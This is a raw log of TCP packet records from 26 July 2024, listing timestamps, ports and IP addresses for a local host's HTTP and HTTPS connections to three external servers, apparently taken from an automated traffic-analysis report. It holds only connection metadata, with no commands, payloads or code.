Jul 26, 2024 20:09:14.580228090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.580291986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.580308914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.580317974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.580329895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.580344915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.580365896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.580440998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.581199884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.581216097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.581231117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.581250906 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.581264973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.581294060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.581331968 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.582165003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.582181931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.582197905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.582215071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.582241058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.582247019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.582264900 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.582274914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.582303047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.582304001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.582329988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.582351923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.583189011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.583205938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.583240032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.583240032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.583260059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.583266020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.583292007 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.583313942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.584124088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.584145069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.584160089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.584173918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.584198952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.584207058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.584219933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.584232092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.584258080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.584279060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.585088015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.585104942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.585134983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.585134983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.585155964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.585165024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.585180998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.585207939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.585905075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.585921049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.585952044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.585978031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:15.276213884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:15.276258945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:15.281307936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:15.281327009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:15.918329954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:15.918395996 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:16.008186102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:16.013504982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:16.202373028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:16.202395916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:16.202413082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:16.202517986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:16.202568054 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:16.206156969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:16.215724945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:16.395227909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:16.395348072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:16.398937941 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:16.407095909 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:16.407176018 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:16.408029079 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:16.413502932 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:16.438893080 CEST	49706	443	192.168.2.5	52.165.165.26
Jul 26, 2024 20:09:16.438931942 CEST	443	49706	52.165.165.26	192.168.2.5
Jul 26, 2024 20:09:16.439925909 CEST	49706	443	192.168.2.5	52.165.165.26
Jul 26, 2024 20:09:16.441554070 CEST	49706	443	192.168.2.5	52.165.165.26
Jul 26, 2024 20:09:16.441570044 CEST	443	49706	52.165.165.26	192.168.2.5
Jul 26, 2024 20:09:17.185576916 CEST	443	49706	52.165.165.26	192.168.2.5
Jul 26, 2024 20:09:17.185666084 CEST	49706	443	192.168.2.5	52.165.165.26
Jul 26, 2024 20:09:17.190546989 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.190606117 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.190633059 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.190680027 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.190730095 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.190778971 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.191066980 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.191082001 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.191098928 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.191138029 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.191175938 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.191239119 CEST	49706	443	192.168.2.5	52.165.165.26
Jul 26, 2024 20:09:17.191247940 CEST	443	49706	52.165.165.26	192.168.2.5
Jul 26, 2024 20:09:17.191664934 CEST	443	49706	52.165.165.26	192.168.2.5
Jul 26, 2024 20:09:17.192053080 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.192116022 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.192157030 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.192184925 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.192575932 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.192595959 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.192640066 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.192657948 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.195512056 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.195568085 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.195662975 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.195705891 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.195856094 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.195898056 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.234302998 CEST	49706	443	192.168.2.5	52.165.165.26
Jul 26, 2024 20:09:17.279036999 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.279081106 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.279090881 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.279151917 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.340837955 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.340903997 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.340922117 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.341036081 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.341255903 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.341272116 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.341289043 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.341336966 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.341360092 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.341833115 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.341850042 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.341865063 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.341881037 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.341883898 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.341907978 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.341938972 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.342740059 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.342756033 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.342772007 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.342781067 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.342787981 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.342791080 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.342828989 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.342859983 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.343664885 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.343683004 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.343746901 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.344161034 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.344176054 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.344192982 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.344208002 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.344223976 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.344238997 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.344252110 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.344270945 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.746608019 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.746680021 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.746694088 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.746748924 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.746814966 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.746829033 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.746876001 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.747091055 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.747147083 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.747387886 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.747405052 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.747421026 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.747446060 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.747488022 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.748006105 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.748022079 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.748038054 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.748053074 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.748073101 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.748099089 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.748972893 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.748990059 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.749005079 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.749020100 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.749056101 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.749070883 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.749070883 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.749135017 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.750802994 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.750818014 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.750833988 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.750849009 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.750861883 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.750880003 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.750909090 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.751704931 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.751722097 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.751738071 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.751754045 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.751766920 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.751795053 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.751826048 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.752698898 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.752716064 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.752731085 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.752747059 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.752774954 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.752806902 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.753638983 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.753655910 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.753676891 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.753694057 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.753706932 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.753740072 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.753740072 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.753819942 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.754416943 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.754432917 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.754447937 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.754462957 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.754478931 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.754479885 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.754513979 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.754525900 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.755388975 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.755404949 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.755419016 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.755434036 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.755441904 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.755453110 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.755507946 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.755523920 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.755553007 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.755573988 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.756366014 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.756381989 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.756396055 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.756411076 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.756426096 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.756445885 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.756469965 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.757415056 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.757431984 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.757446051 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.757461071 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.757471085 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.757477999 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.757488012 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.757493019 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.757535934 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.757535934 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.758342028 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.758357048 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.758372068 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.758385897 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.758394957 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.758400917 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.758418083 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.758450985 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.759255886 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.759272099 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.759287119 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.759299994 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.759301901 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.759318113 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.759319067 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.759334087 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.759342909 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.759361029 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.759387970 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.760149002 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.760163069 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.760176897 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.760191917 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.760204077 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.760206938 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.760234118 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.760385990 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.760806084 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.760826111 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.760868073 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.760868073 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.761199951 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.761214972 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.761229038 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.761245012 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.761257887 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.761260986 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.761275053 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.761286020 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.761301041 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.761327028 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.762130976 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.762145996 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.762161970 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.762176991 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.762191057 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.762221098 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.762618065 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.762633085 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.762649059 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.762665033 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.762676001 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.762722015 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.763189077 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.763204098 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.763219118 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.763264894 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.763288021 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.763633966 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.763648987 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.763664007 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.763679028 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.763700008 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.763727903 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.764195919 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.764211893 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.764242887 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.764256001 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.764508963 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.764523983 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.764538050 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.764549971 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.764555931 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.764564991 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.764581919 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.764592886 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.765183926 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.765201092 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.765216112 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.765227079 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.765230894 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.765239000 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.765245914 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.765254974 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.765271902 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.765281916 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:09:17.765948057 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 20:09:17.765961885 CEST	80	49705	185.215.113.16	192.168.2.5
